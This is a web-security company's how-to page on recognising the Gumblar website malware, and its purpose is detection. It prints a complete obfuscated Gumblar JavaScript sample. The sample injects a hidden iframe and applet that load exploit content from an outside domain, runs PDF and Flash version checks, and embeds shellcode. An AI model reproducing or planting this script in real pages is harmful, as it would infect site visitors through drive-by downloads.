Identify if a Malware Script is Gumblar

Updated: March 23, 2010

When the Gumblar malware first infected websites it was easy identify because it only used the domains gumblar.cn and martuz.cn to host its malware code. When it recently returned it started hosting its malware code on many different domains that it has compromised. It is possible to identify whether a malware script is Gumblar by checking the contents of the page that is loaded by the malware script. You should not check this using a web browser because it could cause your computer to become infected with the malware. Instead you should use a tool that allows you to view the contents of web page, such as Rex Swain's HTTP Viewer. First you need to find the malware script on the web page, the Gumblar script is usually placed the </head> and <body> tags and may also be at the bottom of the web page. Then you need to view the contents of the page the malware script loads. Each time the Gumblar code is generated the variables it uses are different, but the basic format of the code is always the same. So if code that is shown is the in the same format as is show below, the malware on the website is Gumblar.

Gumblar Code Example:

// <script>
function DqNHa(sOuO){return sOuO.replace(/%/g,'').replace(/[hT'g]/g,essB)}
scZge='documT65nt.h77riteh28h22g3cdiv sT74yleh3dh5cg22posiT74ig6fnT3aaT62sT6fg6cuteg3b leg66h74T3aT2dh310g300T70xg3b toph3ag2d10h30h30g70h78T3bh5cT22h3eg22)h3bfuh6ection i73(a)g7bdoT63ug6dT65h6eT74.writh65(g22T3ciframe sg72cg3dh5cg22T68tg74ph3aT2fT2fastroT65l.h6cua.plh2fh63ontentT2fg32T2fiT6eh64ex.T70h68T70T3fsh3deT34bg6bvoh71XT26T69dg3dT22+a+T22g5cg22T3eh3ch2fifrh61meT3eh22)T3bg7dto5Sh3dh30T3bvar scodg65T3dg22g25uC031h25u649h39T25T7540T30T33T25u8g423h30h25u0T4340T25u7h308Bg25uADh31Ch25u688Bg25uE80g38T25u0h307CT25u000g30g25u458Bh25uT35T33h33Ch25u54g38g42T25u780g35h25h75g3015T36T25u8g33EAh25uFFC9h25u8BT35T32T25u2072g25uEE0g31T25uAD41g25uDg4231T25T75C19h39g25u0DCg42g25g75Dh3301h25u9940g25u540T32g25uFFT305T25uF37g35g25uFB3T39T25uh45A75T25u8Bh35h45g25u245h45h25uEB01h25u8Bh366T25u4B0Ch25u5T458Bh25T75h3011g43h25uT38BEBT25h75T38h420g34g25h75E801h25uT35B5Eg25uE0g46T46h25uBF50h25uED49g25u7E0g46h25ug443Fh46h25h75565g45h25uT352T350g25u685T34g25uC000g25u0g30T300h25u5T3056T25u8T42BFh25uh45T334Bh25uFFh35FT25u5T39T443g25uCh4501g25g75C085T25uE35T38h25ug375T302g25g7558g455T25u29h35T30g25u8g44g436g25u36h394g25uD5T32g30h25u61A1g25T755g34h301g25T75FC30T25ug45ET383g25u75h304g25uC3F0T25uT4663T31g25u30g42T36T25u6T415BT25h75524T30g25uE2C1T25g755h3202T25uBFg356g25h75CA54g25h759g31T41FT25uDg33T46FT25uC08T35T25T750B7h35g25u00h458g25uT300T30g30g25ug35h3800h25u002Dg25ug30h30C0g25u50g30h30g25g750Ch45T38T25T75g30000T25ug37700g25ug36h45g369h25uh36Eg369T25u7T346h35h25g75642Eh25uh36T43h36Cg25uBF00h25u4ET38h45g25ug45C0Eh25uh443g46T46T25u5695g25u5656T25u5656h25u29BFT25h75E8h344h25g75FF57h25ug356D3T25u0068g25g750001T25T755684g25uE85T36T25ug46F70T25T75FFh46Fh22T3bh66uT6ection h65k13()h7bretuh72h6e tT72T75eh3bg7dwindow.oneh72T72orh3dek13g3bfuT6ection n73(g61)g7bT76T61r k,h73,ih3bg69f(navh69g67atoh72.mimeg54g79pes.lh65nh67tg68T26h26(kh3dnag76h69h67atoT72.h70lug67g69h6esg29)fT6fr(ig3d0h3big3ck.lenh67T74h68T3bi++)h7bsT3dkT5bg69T5d.h6eameh3bif(g73.indh65g78Of(ah29h3eT3dg30T29h72eg74uh72nh20kg5bih5dg3bg7dreturg6e 0T3bg7dif(ng61vih67ator.jaT76ag45nabled()T29document.wg72ite(g22T3caph70letT20cT6fdeT3dg5ch22zzz.ttth2ead3740b4.h63lasT73h5ch22 arcT68ig76eT3dT5cT22g68ttg70g3ag2fg2fastrh6feT6c.T6cuah2eT70lg2fT63ontentg2f2h2fih6eh64exh2epT68pT3fsT3de4T62kh76oqXg26idg3d6h5ch22 T77idg74T68g3dh3300 g68g65T69g67h68tT3d300g3eh3cparh61m nameg3dT5cT22g64g61g74g61g5ch22 valueg3dT5cT22h68ttpT3ah2fg2fastg72oh65l.luT61.pg6ch2fcoT6eT74T65T6eth2fT32g2findexg2epg68h70T3fsh3de4bkh76oqXT26idT3d14g26T5cT22h3eh3cpag72h61mT20nh61g6deh3dh5cg22ccT5cT22g20h76alueg3dT5cT22h31T5ch22g3eT3cg2fg61ppletg3eT22)h3bg6ag70g54T62wg3d0T3bg74rT79T7bjh70h54bwT3dnewh20Ah63tiT76eXh4fbjecT74T28T22g41croPDh46.PDFg22)h3bg7dcath63T68(eg29g7bh7diT66(T21jpT54bw)tryh7bjT70g54bh77h3dT6eew ActiveXObjecg74(T22PDF.h50dfCtrlT22g29g3bT7dcath63T68(e)T7bT7difT28jpg54bw)g7bh76aT72 lvh3d((jph54h62w.Gg65th56erh73ioT6es().T73pg6cit(h22g2cT22g29)g5b4h5d.g73ph6cig74(g22T3dg22))g5bg31g5dh2erg65pT6ch61h63eg28g2fT5ch2eT2fg67,T22T22)h3bjpT54bT77T3d(lvh3ch390h30)g26T26(lvg21g3d813)T3bg7dg65T6ch73g65 jh70g54g62wT3dn73T28T22Ah64obeh20Ah22)T7ch7cn73(h22T41h64h6fbe Pg22)h3bifT28g6apT54bw)h69T373(2)g3bh74h6f5Sh3dT30T3bjg70T54bT77T3d0h3bfh75ng63tioT6e s73h28h61)T7bif(aT5b0g5dh3dg3dT39)T7bjh70h54bwT3dag5b2T5dT3c124h3btg6fT35ST3d(aT5b2g5dh3e1g36)T26h26h28ah5bh32T5dg3c2T346)T3bT7deT6cse ifh28h61g5b0T5dg3dg3d10)to5Sh3dah5bh32T5dT3c23h3bT74oh35Sh3dtoh35Sh26g26(navih67h61th6fr.userg41T67eh6et.toLowerCah73e().indh65T78h4ff(T22sah66arg69T22)g3dg3dT2d1T29h3bT7dif((xg3dnh373(g22FT6casg68h22))T26T26(xg3dx.T64eh73crT69h70tionh29)s73(x.h72eph6caceT28h2f(g5baT2dT7ag41T2dZh5dT7cT5cs)h2bg2f,h22h22).T72T65placg65(g2f(T5cs+g72g7cT5cT73+bT5b0g2d9h5dg2b)g2f,g22h2eg22).spg6ciT74(g22.g22)h29h3belse h74g72yh7bsg373((new Ag63tiveXg4fbject(g22ST68ockwah76eFlag73g68h2eSg68og63kwaT76h65g46lash68g22h29T29.h47eth56T61riablT65(T22T24versionT22T29.split(g22 T22)h5b1g5dT2eT73plg69t(h22T2cT22))h3bh7dT63ag74cg68h28e)T7bh7diT66T28h6apT54bw)ih373(h33)g3bT64oT63ument.wT72ig74e(g22h3cT2fT64ivg3eg22T29g3b';
w7g8=5;try{if(essB='a')throw new TypeError('2'+w7g8);}catch(w7g8){essB=unescape('%'+DqNHa(w7g8.message));essB=DqNHa(scZge);DqNHa=eval}DqNHa(unescape(essB));

//</script>

Service

Website Malware Removal

White Fir Design

Web Design, Security, and Marketing

Identify if a Malware Script is Gumblar

Related:

Service

Resources

You are here

Identify if a Malware Script is Gumblar

Related:

Service

Resources